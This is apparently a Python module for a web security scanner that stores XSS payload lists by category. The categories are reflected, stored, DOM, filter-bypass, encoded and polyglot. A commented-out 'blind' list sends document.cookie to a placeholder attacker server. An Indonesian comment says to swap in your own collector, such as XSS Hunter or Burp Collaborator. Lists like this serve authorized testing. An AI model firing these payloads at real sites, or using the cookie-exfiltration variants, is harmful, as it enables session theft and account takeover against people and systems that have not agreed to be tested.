# Ganti dengan server kamu (XSS Hunter, Burp Collaborator, dll)
YOUR_SERVER = "https://YOUR_SERVER.com"

REFLECTED = [
    "<script>alert(1)</script>",
    "'\"><script>alert(1)</script>",
    "<script>alert(document.domain)</script>",
    "<script>alert(document.cookie)</script>",
    "\"><script>alert(1)</script>",
    "'><script>alert(1)</script>",
    "</script><script>alert(1)</script>",
    "<script>alert(window.origin)</script>",
    "<script>alert(1)//",
    "\";alert(1);//",
    "');alert(1);//",
    "<script>alert(1)</script>&",
    "%3Cscript%3Ealert(1)%3C/script%3E",
    "<SCRIPT>alert(1)</SCRIPT>",
    "<script >alert(1)</script>",
    "<script\t>alert(1)</script>",
    "<script\n>alert(1)</script>",
    "'onmouseover='alert(1)",
    "\" onmouseover=\"alert(1)\"",
    "'; alert(1); '",
    "\"); alert(1); //",
]

STORED = [
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<body onload=alert(1)>",
    "<input autofocus onfocus=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<video src=x onerror=alert(1)>",
    "<audio src=x onerror=alert(1)>",
    "<iframe src=javascript:alert(1)>",
    "<object data=javascript:alert(1)>",
    "<marquee onstart=alert(1)>",
    "<select autofocus onfocus=alert(1)>",
    "<textarea autofocus onfocus=alert(1)>",
    "<button onclick=alert(1)>click</button>",
    "<form><button formaction=javascript:alert(1)>click</button></form>",
    "<svg><animate onbegin=alert(1) attributeName=x>",
    "<svg><set onbegin=alert(1) attributeName=x>",
    "<img src=x onload=alert(1)>",
    "<div onmouseover=alert(1)>hover me</div>",
    "<div onclick=alert(1)>click me</div>",
    "<table background=javascript:alert(1)>",
    "<td background=javascript:alert(1)>",
]

DOM = [
    "<img src=x onerror=alert(document.cookie)>",
    "javascript:alert(1)",
    "#<script>alert(1)</script>",
    "'-alert(1)-'",
    "\";alert(1)//",
    "javascript:alert(document.cookie)",
    "'-alert(document.domain)-'",
    "\"><img src=x onerror=alert(1)>",
    "<svg onload=alert(document.cookie)>",
    "\\x3cscript\\x3ealert(1)\\x3c/script\\x3e",
    "\\u003cscript\\u003ealert(1)\\u003c/script\\u003e",
    "</script><svg onload=alert(1)>",
    "'-alert(document.cookie)-'",
    "\"+alert(1)+\"",
    "'+alert(1)+'",
    "`;alert(1)//",
    "${alert(1)}",
    "{{constructor.constructor('alert(1)')()}}",
]

BYPASS = [
    "<ScRiPt>alert(1)</ScRiPt>",
    "<script>alert`1`</script>",
    "<svg/onload=alert(1)>",
    "<%00script>alert(1)</script>",
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    "<script>alert(1)<!--",
    "<svg><script>alert(1)</script></svg>",
    "<img src=`x` onerror=alert(1)>",
    "<img src=' ' onerror=alert(1)>",
    "<script/src=data:,alert(1)></script>",
    "<script>window['alert'](1)</script>",
    "<script>top['alert'](1)</script>",
    "<script>self['alert'](1)</script>",
    "<a href=javascript&colon;alert(1)>click</a>",
    "<img src=x onerror=\"alert(1)\">",
    "<svg onload=alert&#40;1&#41;>",
    "<<script>alert(1)<</script>",
    "<input type=text value=\"`\"><img src=x onerror=alert(1)\">",
    "<svg><script>alert&#40;1&#41;</script></svg>",
    "<BODY ONLOAD=alert(1)>",
    "<IMG SRC=x ONERROR=alert(1)>",
]

FILTERED = [
    "<ScRiPt>alert(1)</ScRiPt>",
    "scr<script>ipt>alert(1)</scr</script>ipt>",
    "<script>alert`1`</script>",
    '<img src=x onerror="&#97;&#108;&#101;&#114;&#116;(1)">',
    "<svg/onload=alert(1)>",
    "'-alert(1)-'",
    "</script><script>alert(1)</script>",
    '<a href="javascript:void(0)" onmouseover=alert(1)>x</a>',
    "<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
    "<svg onload=&#97;&#108;&#101;&#114;&#116;(1)>",
    "<script>&#97;&#108;&#101;&#114;&#116;(1)</script>",
    "<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
    "<script>eval(atob('YWxlcnQoMSk='))</script>",
    "<script>Function('alert(1)')()</script>",
    "<script>setTimeout(alert,0,1)</script>",
    "<script>[].constructor.constructor('alert(1)')()</script>",
    "<script>alert(String.fromCharCode(88,83,83))</script>",
    "<script>window.onerror=alert;throw 1</script>",
    "<script>throw onerror=alert,1</script>",
    "<script>{onerror=alert}throw 1</script>",
    "<script>void(alert(1))</script>",
    "<script>alert?.call(window,1)</script>",
    "<script>alert?.`1`</script>",
]

DOM_BASED = [
    "javascript:alert(1)",
    "javascript:alert(document.domain)",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "data:text/html,<script>alert(1)</script>",
    "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+",
    "#\"><img src=x onerror=alert(1)>",
    "javascript:void(alert(1))",
    "javascript:alert(document.cookie)",
    "javascript:eval(atob('YWxlcnQoMSk='))",
    "data:text/html,<img src=x onerror=alert(1)>",
    "#<img src=x onerror=alert(1)>",
    "javascript:window.onerror=alert;throw 1",
    "javascript:alert(window.location)",
]

POLYGLOT = [
    "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>,",
    "'\">><marquee><img src=x onerror=confirm(1)></marquee>\"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'\">--!><script>alert(1)</script>",
    "<script>-alert(1)//</script>",
    "\";alert(1);//<br/onmouseover=alert(1)>",
    "';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
    "<!--<img src=x onerror=alert(1)>-->",
    "<![CDATA[<script>alert(1)</script>]]>",
    "\"><svg onload=alert(1)>",
    "'\"><svg onload=alert(1)>",
    "'\"--><body onload=alert(1)>",
]

# BLIND = [
#     f"<img src=x onerror=\"this.src='{YOUR_SERVER}/?c='+document.cookie\">",
#     f"<img src=x onerror=\"fetch('{YOUR_SERVER}/?c='+document.cookie)\">",
#     f"<script>new Image().src='{YOUR_SERVER}/?c='+document.cookie</script>",
#     f"<script>fetch('{YOUR_SERVER}/?c='+document.cookie)</script>",
#     f"<script>var x=new XMLHttpRequest();x.open('GET','{YOUR_SERVER}/?c='+document.cookie);x.send()</script>",
#     f"<svg onload=\"fetch('{YOUR_SERVER}/?c='+document.cookie)\">",
#     f"<svg onload=\"new Image().src='{YOUR_SERVER}/?c='+document.cookie\">",
#     f"<script>fetch('{YOUR_SERVER}/?u='+document.URL+'&c='+document.cookie)</script>",
#     f"<script>new Image().src='{YOUR_SERVER}/?u='+btoa(document.URL)+'&c='+btoa(document.cookie)</script>",
#     f"<iframe onload=\"fetch('{YOUR_SERVER}/?c='+document.cookie)\">",
#     f"<input onfocus=\"fetch('{YOUR_SERVER}/?c='+document.cookie)\" autofocus>",
#     f"<body onload=\"fetch('{YOUR_SERVER}/?c='+document.cookie)\">",
# ]
XSS_PAYLOADS = REFLECTED + STORED + DOM + BYPASS + FILTERED + DOM_BASED + POLYGLOT

XSS_BY_TYPE = {
    "reflected": REFLECTED,
    "stored": STORED,
    "dom": DOM,
    "bypass": BYPASS,
    "filtered": FILTERED,
    "dombased": DOM_BASED,
    "polyglot": POLYGLOT,
    # "blind": BLIND,
}